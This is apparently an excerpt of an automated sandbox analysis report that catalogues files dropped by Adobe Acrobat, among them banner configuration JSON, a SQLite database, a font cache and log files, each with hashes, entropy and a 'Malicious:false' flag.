                                                                                                        SHA-512:39A7C3336D690952FE9C4004DF7FE454FF1F3B80E51ED6FF00D60A38852D5BAFC44A228B396834E1266AA9DCACA2F374F6D9056FC415FA602059D9BE5ABBAA76
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"27aa94e9-700b-4c49-afb9-a436fb7fe7c6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734718722895,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1123
                                                                                                        Entropy (8bit):5.688560290390633
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:Yv6XlE1bmeO9pLgE9cQx8LennAvzBvkn0RCmK8czOCCSWn:YvmEMeqhgy6SAFv5Ah8cv/W
                                                                                                        MD5:D7930772142C0D7482A9A55E7ED5FCB3
                                                                                                        SHA1:EB9888C610267902DBA333211428AECD393F40B6
                                                                                                        SHA-256:D254EF5B6E6755F7258E0B2E6488730AF53BC815160243616FCCDDAB0E689686
                                                                                                        SHA-512:54B81F82FE22EBB2094542316D2F1AAA630F583FD71D529B879C92068DEB9D0B6FC528F35035FE6E5A72B91DC06DF2D7694EF051C09796F3E4B2C8DC57DE4E2A
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"27aa94e9-700b-4c49-afb9-a436fb7fe7c6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734718722895,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):289
                                                                                                        Entropy (8bit):5.286516529657675
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXFSDnSE14WsGiIPEeOF0Y/oAvJf8dPeUkwRe9:YvXKXFQSE1bsdTeOgGU8Ukee9
                                                                                                        MD5:73556CC0FE4E76485885D09C471E00A3
                                                                                                        SHA1:9806402FD5B9761E282283430CE90CAFACF0D812
                                                                                                        SHA-256:47D69E05788C04807BB821EBF8AC7D11979612ABF631D4CABB38924DB6D30246
                                                                                                        SHA-512:8D6FA13CC90788557722A9D48B55FA287A9B38D8AD3AEBCD5C9282FA2205F7686D74F22285051541A144C7A59063E30595C97E2E71B17D629BA9CC2DCB287045
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"27aa94e9-700b-4c49-afb9-a436fb7fe7c6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734718722895,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):292
                                                                                                        Entropy (8bit):5.291121120210908
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXFSDnSE14WsGiIPEeOF0Y/oAvJfQ1rPeUkwRe9:YvXKXFQSE1bsdTeOgGY16Ukee9
                                                                                                        MD5:866203DC51720629DF2E6A900E947C90
                                                                                                        SHA1:D2759FE3B861563986CB029A8C688612D7B6A11E
                                                                                                        SHA-256:0B53F18C7B67C0CE7054DC70ABEB6AB658D19F205A9282C85BCB9AE974FCE42D
                                                                                                        SHA-512:AA93F48ABE798CCA50D5DC49A77E85AEC83E0933A8D2138AFC0A8578A13E313D1B52B739AAFEF84C8F9483137E8B095219DB83ADD2231B536C760FBE2B5BA190
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"27aa94e9-700b-4c49-afb9-a436fb7fe7c6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734718722895,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):289
                                                                                                        Entropy (8bit):5.30824424693862
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXFSDnSE14WsGiIPEeOF0Y/oAvJfFldPeUkwRe9:YvXKXFQSE1bsdTeOgGz8Ukee9
                                                                                                        MD5:A6208EE02FDC532D4A0F048952E5F609
                                                                                                        SHA1:7ED9F6844BCAD8AA921377AA922D5BCA03A0AD0C
                                                                                                        SHA-256:084460899CEA86767EB9EB4F42CBD8E6CCE63452DC338B84E0E0D9D68F1F7A10
                                                                                                        SHA-512:57A1F405DDCF948A6F904BF97855CE411792A503A5F21F1D1CC24EC39A93F47FBAD881A8D2CB7AC8FFE585793C126D40892DE7DBA49AB23C5812217E8B6CDD59
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"27aa94e9-700b-4c49-afb9-a436fb7fe7c6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734718722895,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):295
                                                                                                        Entropy (8bit):5.312393477821367
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXFSDnSE14WsGiIPEeOF0Y/oAvJfzdPeUkwRe9:YvXKXFQSE1bsdTeOgGb8Ukee9
                                                                                                        MD5:84C2EC0C722D42AC224DE5A2CFD75839
                                                                                                        SHA1:51A7F51259DE692C5D74DE4483014054B9D6093E
                                                                                                        SHA-256:B2DC2C872C32275E77CF1833CA51BCAA242383533A430E04D7E78AEADA596B71
                                                                                                        SHA-512:7FC4FADB97DFBF5089D93638E7601276626CF6655A65C8AED9024B9778CC0EE530B205D5984326133D4B6D71F0C5B0BF63084C20010E1E78843CC2CF8E439B63
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"27aa94e9-700b-4c49-afb9-a436fb7fe7c6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734718722895,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):289
                                                                                                        Entropy (8bit):5.293432848826991
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXFSDnSE14WsGiIPEeOF0Y/oAvJfYdPeUkwRe9:YvXKXFQSE1bsdTeOgGg8Ukee9
                                                                                                        MD5:BFC16A256FABB758BEA46CDC093A01D8
                                                                                                        SHA1:5AE08B85A513B2B88F03AECBD0F7FDCD89BCE9E6
                                                                                                        SHA-256:B440F5FF3AA342ACB436DBE173A7D1377D56538BFDC22D75C9A765B65EEC364F
                                                                                                        SHA-512:D5903740504D1E5BA37739D4932C64C1761CF60C9AFA7C59B12320791E20A722E32817D9E305AD4B859CD791C6136968CBE0E5CA0E129B540DD1C08BA3ECAA66
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"27aa94e9-700b-4c49-afb9-a436fb7fe7c6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734718722895,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):284
                                                                                                        Entropy (8bit):5.279666593718826
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXFSDnSE14WsGiIPEeOF0Y/oAvJf+dPeUkwRe9:YvXKXFQSE1bsdTeOgG28Ukee9
                                                                                                        MD5:696595E494B584B04172C9D1C1EB125C
                                                                                                        SHA1:EC96A3BE53F2983B0654F1D93C36CCF339A13E69
                                                                                                        SHA-256:0945212683B536E92EE9DC0D2944A254A76F507F8E829D01779445EAA5F587F2
                                                                                                        SHA-512:6EB89182EA5C1E573A174F2AE3B653D28A37F4F73B2C07AD66689C472C7C763D69652174C980E19AAFD4A92BB80E40BA487A00849CF52DC5DD543A3723BA40FD
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"27aa94e9-700b-4c49-afb9-a436fb7fe7c6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734718722895,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):291
                                                                                                        Entropy (8bit):5.277025081560463
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXFSDnSE14WsGiIPEeOF0Y/oAvJfbPtdPeUkwRe9:YvXKXFQSE1bsdTeOgGDV8Ukee9
                                                                                                        MD5:B626BC5ECEBFE20A3FF3252AE77A34BD
                                                                                                        SHA1:C2136DED1A03E5DB3F93BBB1E151F971649BD7B1
                                                                                                        SHA-256:96801D69483C2937147E560FA38150C2220BF6E2CC263010FA6E5A6D60EEE84A
                                                                                                        SHA-512:62877A3E6326AE36F12D1BB2C919460F181C1D06B38B4930AC059F3F56CCBC1F72E62C8B79B3E1852D531DC1CFFFFA18EF643D70368E0C6C30BC716B9EBD1E76
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"27aa94e9-700b-4c49-afb9-a436fb7fe7c6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734718722895,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):287
                                                                                                        Entropy (8bit):5.282160911770755
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXFSDnSE14WsGiIPEeOF0Y/oAvJf21rPeUkwRe9:YvXKXFQSE1bsdTeOgG+16Ukee9
                                                                                                        MD5:9DCE6B3AEAB480628231590C2458D51F
                                                                                                        SHA1:2C861D1A816399E4462C120C99BF792E66EF7400
                                                                                                        SHA-256:0446F90C80D9144BE1B12C383F4D472B8BBCBE4C9359F65CFA40AAEED68D2491
                                                                                                        SHA-512:185FC6FC746C2B42838C81BEBDA001279F0EC8328056F6993500D7613E5DE78C25C8D08D0583B630964A5E96FCE44340C76F8B86F38277917792CFBA81B3B5E1
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"27aa94e9-700b-4c49-afb9-a436fb7fe7c6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734718722895,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1090
                                                                                                        Entropy (8bit):5.6639532861332835
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:Yv6XlE1bmeOFamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSWn:YvmEMe4BgkDMUJUAh8cvMW
                                                                                                        MD5:2802FE35CF700783B73E46327197A137
                                                                                                        SHA1:D8D44AFA6ACFCD0C1674E697D7159F34147A9BDB
                                                                                                        SHA-256:C984395BE370FC6F47BFE26862B085787C3B253E225642ABEC938CC2DA0144A9
                                                                                                        SHA-512:1C33BADF09DA83F8646CEB02ADFF275149EC69042F85DB091D4FA92C8280516D08B0F44E0FC7D78C42ED6EBC07C2D043C8249059459CE1BCD49A4AAE9A532112
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"27aa94e9-700b-4c49-afb9-a436fb7fe7c6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734718722895,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):286
                                                                                                        Entropy (8bit):5.259494145741853
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXFSDnSE14WsGiIPEeOF0Y/oAvJfshHHrPeUkwRe9:YvXKXFQSE1bsdTeOgGUUUkee9
                                                                                                        MD5:8175E797CBA61364D75FE838390F33F9
                                                                                                        SHA1:B877F7B1A0E0DEA82C2A68137EB634AF171B02C1
                                                                                                        SHA-256:765AA0F3A3FF36A3B4848DAAEF9A9626A949E253C7A0DE4A11EF5385AA1AB78A
                                                                                                        SHA-512:97D494FEE7A189BA9EB02419A48429122FCAEBE303DED3E4FA8DFCAB18B79DB95F0426B56100968B46113E5B4D51FF4C98D6C6D95ED0C6E4DFEC50578540EA9E
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"27aa94e9-700b-4c49-afb9-a436fb7fe7c6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734718722895,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):282
                                                                                                        Entropy (8bit):5.277097804324271
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXFSDnSE14WsGiIPEeOF0Y/oAvJTqgFCrPeUkwRe9:YvXKXFQSE1bsdTeOgGTq16Ukee9
                                                                                                        MD5:D1CDC95F8381EB15F64459632203D478
                                                                                                        SHA1:777B8C80DE03F3119EE35E9844657EC5E8E7611D
                                                                                                        SHA-256:EA22014ACCE4C9D05D0059483F6732F3E5474475FEAC996909E8F15B218E9DD0
                                                                                                        SHA-512:CDFA07CAD3F9943138370830DC11431C333E8EB8F11F91D43A8710283F9099C3118DCDD13144BE2DCCA2F35833874D7C561D6E3C69454CC6DAF71F757EFD19D3
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"27aa94e9-700b-4c49-afb9-a436fb7fe7c6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734718722895,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4
                                                                                                        Entropy (8bit):0.8112781244591328
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:e:e
                                                                                                        MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                                        SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                                        SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                                        SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                                        Malicious:false
                                                                                                        Preview:....
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2814
                                                                                                        Entropy (8bit):5.138469884307509
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:YnSaNHayKdPeLBJX5F+jPkMbxKUyOk8dn2jnsRj0SSSi24kVVP2LSMCDL9IF4h0i:YnuCzwAAyn+0I7PiM9U4hVyh9g
                                                                                                        MD5:EAD7B71AB9D9454310F333346E3CAF87
                                                                                                        SHA1:DC489A76C584B41FC9B6100CB142CE5C9974AA34
                                                                                                        SHA-256:F909E84647DEC1AE12176B1B02A9543FFD2AFB0FE655EB509370433BE9249EF8
                                                                                                        SHA-512:46D3C2D11F162DCC29FAAE74BD33DC6A06BDC17550E07060537E8CA29F9F490DF858E5882262AA2DDF6A1B1C224565AD075EE4902E9FE875B4CF5AD3496FCB76
                                                                                                        Malicious:false
                                                                                                        Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"0365e4cda6e7187dd4a4ef6b1922ed52","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734544122000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"a9cd7f87b7cc77a8d563fa9e5ddff8d1","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734544122000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"c2f0b87b020eb79291ca9a40ee631bae","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734544122000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"296e4be0a157b0240acb04516ed7abd7","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734544122000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"9de5fb1105e382bf438df3ea7fa12898","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734544122000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"decfda6347a5655387ecf7880f7b027f","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                                                        Category:dropped
                                                                                                        Size (bytes):12288
                                                                                                        Entropy (8bit):1.4526212621840184
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:TGufl2GL7msCvrBd6dHtbGIbPe0K3+fDy2dsblZ:lNVmsw3SHtbDbPe0K3+fDZdU
                                                                                                        MD5:6E090A9A0A534FE606308FFADFBE42E1
                                                                                                        SHA1:C704C02900A1D1E57FF7BA6B21933B1093A93320
                                                                                                        SHA-256:8E7CF01D4D475A53C1C02C2FDF9368638B0C6FB27F3B281AAC4FFA0E6BE183AF
                                                                                                        SHA-512:DC95C9030311394E932EF0D4330E0E5AD6EB44FCD6A5F737CDA5E71528ADD0C4A48AF42E63628A9302DEA5CD1B0AB06910790EAAF030CA9FA89AA39946553E84
                                                                                                        Malicious:false
                                                                                                        Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:SQLite Rollback Journal
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8720
                                                                                                        Entropy (8bit):1.9573307977378351
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:7MDrvrBd6dHtbGIbPe0K3+fDy2ds64qFl2GL7ms/:7u3SHtbDbPe0K3+fDZdcKVms/
                                                                                                        MD5:B1A485A348A800126E20465163BEABD2
                                                                                                        SHA1:4ECDF99ACA185D3E20CFCA9248CC4815CFF15C46
                                                                                                        SHA-256:1042C1C0626E09F7179545B3BA2E5E7321DA033072BAB896C77208BCEA4383BF
                                                                                                        SHA-512:63478F8A8AA384C7F46D96489B6A9BF45C5B0F781A27D2EECF8F35DE60E469B8F5175D0DE4EF982B705E3C62E2DC2166045E4B9BDCDD3D0B77B261735304FF79
                                                                                                        Malicious:false
                                                                                                        Preview:.... .c.....n.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................v.../.././././....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):66726
                                                                                                        Entropy (8bit):5.392739213842091
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:RNOpblrU6TBH44ADKZEg3EJOxn4zUzZp3GWV5jlPZaF0Yyu:6a6TZ44ADE3Ewx4zUzrjG0K
                                                                                                        MD5:D244A032B4C9D7127FC97807B9CA052E
                                                                                                        SHA1:E7130EA44565CCED34DCA69CE51EE066640125E9
                                                                                                        SHA-256:1AFDC1D5598834664682EC6A87924007B7C54D3CD07E35A1A81DF917D36963C1
                                                                                                        SHA-512:E8018837ED13E8E60F51B5960B852F13287C542F0337FB936EED4B20CD1DCDAA2B2A59B54AFAED52084E211050CC3FB2993893838962DEF5BEC9FFE20D3A2DE4
                                                                                                        Malicious:false
                                                                                                        Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):246
                                                                                                        Entropy (8bit):3.501595078528367
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8sKDa3oYH:Qw946cPbiOxDlbYnuRKS0oYH
                                                                                                        MD5:D66CC4CDFA7362E8A00EAEA9BB1FA884
                                                                                                        SHA1:D2D38370CCC4A9E6C2C8DD54182F8BA26D846B0F
                                                                                                        SHA-256:5D55A59137764C45994F07A4BC77AAD3F26FB85A79DE7158A331832B93042AE1
                                                                                                        SHA-512:7FFB7EBA17A8AD25D9066C4DE3C57F1093743923BDF532D2970BC42CE5E4C9431461C28AEE5F54A822C07083124CF9C63DF8BD1B49BDBB96A962266A90925CE7
                                                                                                        Malicious:false
                                                                                                        Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.8./.1.2./.2.0.2.4. . .1.2.:.4.8.:.4.0. .=.=.=.....
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:ASCII text, with very long lines (393)
                                                                                                        Category:dropped
                                                                                                        Size (bytes):16525
                                                                                                        Entropy (8bit):5.386483451061953
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:A2+jkjVj8jujXj+jPjghjKj0jLjmF/FRFO7t75NsXNsbNsgNssNsNNsaNsliNsTY:AXg5IqTS7Mh+oXChrYhFiQHXiz1W60ID
                                                                                                        MD5:F49CA270724D610D1589E217EA78D6D1
                                                                                                        SHA1:22D43D4BB9BDC1D1DEA734399D2D71E264AA3DD3
                                                                                                        SHA-256:D2FFBB2EF8FCE09991C2EFAA91B6784497E8C55845807468A3385CF6029A2F8D
                                                                                                        SHA-512:181B42465DE41E298329CBEB80181CBAB77CFD1701DBA31E61B2180B483BC35E2EFAFFA14C98F1ED0EDDE67F997EE4219C5318CE846BB0116A908FB2EAB61D29
                                                                                                        Malicious:false
                                                                                                        Preview:SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:808+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):15114
                                                                                                        Entropy (8bit):5.3539051880404145
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:ncHijimiLi/iiDqyDODYNDkDFDNDwIIIGJ/0oKeKwLuInIPIwILIaUuLuruh/v/l:ne6lycnuyScNoRB8ZTNLpH6AETWggcmd
                                                                                                        MD5:CCEE59B1FF2DD561B6F3805DF7A8E938
                                                                                                        SHA1:53250BDBCC38DE55F6D2B1E0A58F6267AAA34856
